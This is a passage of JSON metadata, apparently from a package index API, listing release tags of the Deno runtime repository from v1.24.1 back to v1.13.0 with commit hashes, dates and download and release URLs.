/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v